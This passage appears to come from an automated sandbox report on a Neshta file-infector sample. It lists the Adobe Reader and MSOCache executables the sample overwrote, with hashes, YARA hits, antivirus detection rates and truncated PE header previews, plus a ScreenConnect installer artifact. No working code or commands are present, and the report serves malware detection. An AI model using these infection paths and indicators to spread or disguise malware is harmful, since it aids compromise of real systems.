                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                21:53:08API Interceptor10x Sleep call for process: svchost.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                BREEDBANDDELFTNLindex_2021-09-30-12_54Get hashmaliciousBrowse
                                • 145.32.220.170
                                L3Gl0GugHoGet hashmaliciousBrowse
                                • 145.41.224.160
                                XyMjGu74RXGet hashmaliciousBrowse
                                • 145.40.82.201
                                nogBoEEoTKGet hashmaliciousBrowse
                                • 145.42.28.16
                                re2.arm7Get hashmaliciousBrowse
                                • 145.32.202.100
                                OyGRw8uet6Get hashmaliciousBrowse
                                • 145.42.40.205
                                2JOGBbcihoGet hashmaliciousBrowse
                                • 145.43.209.253
                                N2fpnW8P5qGet hashmaliciousBrowse
                                • 145.43.209.255
                                nRDfZEGYCVGet hashmaliciousBrowse
                                • 145.40.113.16
                                x3rccmpLIxGet hashmaliciousBrowse
                                • 145.32.114.156
                                ryp5LWcSA8Get hashmaliciousBrowse
                                • 145.42.220.224
                                DgPSz8yXHmGet hashmaliciousBrowse
                                • 145.41.118.138
                                FTFGYpE43OGet hashmaliciousBrowse
                                • 145.41.118.150
                                fN3J4l8kpEGet hashmaliciousBrowse
                                • 145.36.121.253
                                XhEdLIc8VnGet hashmaliciousBrowse
                                • 145.41.118.193
                                iGet hashmaliciousBrowse
                                • 95.128.93.242

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeHYmN4qwdBc.exeGet hashmaliciousBrowse
                                  Z68mMCAxFZ.exeGet hashmaliciousBrowse
                                    Yy788lmJnh.exeGet hashmaliciousBrowse
                                      0yt33vmRtD.exeGet hashmaliciousBrowse
                                        6LkjS4JhAl.exeGet hashmaliciousBrowse
                                          09876523456789.exeGet hashmaliciousBrowse
                                            Y4pMlX1fO2.exeGet hashmaliciousBrowse
                                              B513104971C9E0C5B6721A523C9475701A67BB368A74F.exeGet hashmaliciousBrowse
                                                1J5sT000kJ.exeGet hashmaliciousBrowse
                                                  ij99opH1kI.exeGet hashmaliciousBrowse
                                                    McAfeeStingerPortable.exeGet hashmaliciousBrowse
                                                      javaw.exeGet hashmaliciousBrowse
                                                        javaw.exeGet hashmaliciousBrowse
                                                          Lw6h2Z5Lg5.exeGet hashmaliciousBrowse
                                                            Shipping documentsProforma invoice.exeGet hashmaliciousBrowse
                                                              je60o4s3gS.exeGet hashmaliciousBrowse
                                                                8doUcc9Dn2.exeGet hashmaliciousBrowse
                                                                  y9pE5n5u9D.exeGet hashmaliciousBrowse
                                                                    wVdurpHHFa.exeGet hashmaliciousBrowse
                                                                      smHWkWDwfX.exeGet hashmaliciousBrowse

                                                                        Created / dropped Files

                                                                        C:\Config.Msi\5e0b04.rbs
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):217235
                                                                        Entropy (8bit):6.580686724845479
                                                                        Encrypted:false
                                                                        SSDEEP:3072:QT9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGl:QTuH2aCGw1ST1wQLdqvl
                                                                        MD5:6500D17990C070DDA633CB7D1299A94D
                                                                        SHA1:C2AFBBEA442FD91643DBC1CD665A370CE89240FC
                                                                        SHA-256:757F61C46E7A082B8489BF79F3D1B5185B71BA43ACF36425C544997AA17802DD
                                                                        SHA-512:510395E3854F77EA23FE9A2D8795E651AF91AE50546718D36D78CD18BCE52BFF65520DFCD1BF8A22940B52EA701BE4B4E0083F751A2998218ABE7B9D8697A4FE
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5e0b04.rbs, Author: Joe Security
                                                                        Preview: ...@IXOS.@.....@..AS.@.....@.....@.....@.....@.....@......&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}'.ScreenConnect Client (77af187dd37f08fd)..setup.msi.@.....@Qb...@.....@......DefaultIcon..&.{9C0A6111-B899-49EE-9A79-EF61274BA5E5}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (77af187dd37f08fd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4768BE46-975A-455C-AF15-61A15FE629A4}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@......&.{6DCE5A21-0DC7-4711-A8DC-2DDE062B4424}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@......&.{4131B28B-C591-485C-81BB-59C107C8780A}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@......&.{65DC5071-7A1F-4E32-8C11-DC3D60C6921B}&.{88CF3F24-93A2-493E-BA63-1D8CC976DBBA}.@........StopServices..Stopping services..Service: [1]....CreateFolders..Creating folders..Folder: [1]#.7.C:\ProgramData\ScreenConnect Client (77af187dd37f08fd)\.@........InstallFil
                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.278258254187173
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
                                                                        MD5:E47F8A2ECDC2D4BFBBB6328B1391F1CC
                                                                        SHA1:A633C3106A89C083014FC9F29D559B70E93D6D69
                                                                        SHA-256:8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                                                                        SHA-512:6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Joe Sandbox View:
                                                                        • Filename: HYmN4qwdBc.exe, Detection: malicious, Browse
                                                                        • Filename: Z68mMCAxFZ.exe, Detection: malicious, Browse
                                                                        • Filename: Yy788lmJnh.exe, Detection: malicious, Browse
                                                                        • Filename: 0yt33vmRtD.exe, Detection: malicious, Browse
                                                                        • Filename: 6LkjS4JhAl.exe, Detection: malicious, Browse
                                                                        • Filename: 09876523456789.exe, Detection: malicious, Browse
                                                                        • Filename: Y4pMlX1fO2.exe, Detection: malicious, Browse
                                                                        • Filename: B513104971C9E0C5B6721A523C9475701A67BB368A74F.exe, Detection: malicious, Browse
                                                                        • Filename: 1J5sT000kJ.exe, Detection: malicious, Browse
                                                                        • Filename: ij99opH1kI.exe, Detection: malicious, Browse
                                                                        • Filename: McAfeeStingerPortable.exe, Detection: malicious, Browse
                                                                        • Filename: javaw.exe, Detection: malicious, Browse
                                                                        • Filename: javaw.exe, Detection: malicious, Browse
                                                                        • Filename: Lw6h2Z5Lg5.exe, Detection: malicious, Browse
                                                                        • Filename: Shipping documentsProforma invoice.exe, Detection: malicious, Browse
                                                                        • Filename: je60o4s3gS.exe, Detection: malicious, Browse
                                                                        • Filename: 8doUcc9Dn2.exe, Detection: malicious, Browse
                                                                        • Filename: y9pE5n5u9D.exe, Detection: malicious, Browse
                                                                        • Filename: wVdurpHHFa.exe, Detection: malicious, Browse
                                                                        • Filename: smHWkWDwfX.exe, Detection: malicious, Browse
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.3372362912074625
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
                                                                        MD5:10075707D5C79CDACFE09DEF9C6D4985
                                                                        SHA1:7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
                                                                        SHA-256:3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
                                                                        SHA-512:C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.220006974675465
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
                                                                        MD5:F447C4B446D5889225A9D9082145AD88
                                                                        SHA1:A1A380F3D3402F243E1A213C39E969D2C24CA99E
                                                                        SHA-256:C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
                                                                        SHA-512:E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.356945716242827
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
                                                                        MD5:DE64003856A8B74AEAF33E247AF9424B
                                                                        SHA1:912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
                                                                        SHA-256:A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
                                                                        SHA-512:4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.486359083061706
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
                                                                        MD5:D972E8BC4F221D69D9DF89999B74C311
                                                                        SHA1:3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
                                                                        SHA-256:8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
                                                                        SHA-512:DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.5232250585402545
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
                                                                        MD5:F648557D5287EC8C3677DC5B57E1C6AC
                                                                        SHA1:B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
                                                                        SHA-256:647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
                                                                        SHA-512:033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.186107093668235
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                                        MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                                        SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                                        SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                                        SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.667436230875162
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                                        MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                                        SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                                        SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                                        SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.461209967778202
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                                        MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
                                                                        SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                                        SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                                        SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.302303877870808
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                                        MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                                        SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                                        SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                                        SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.261294291615621
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                                        MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                                        SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                                        SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                                        SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.423139673646388
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                                        MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                                        SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                                        SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                                        SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
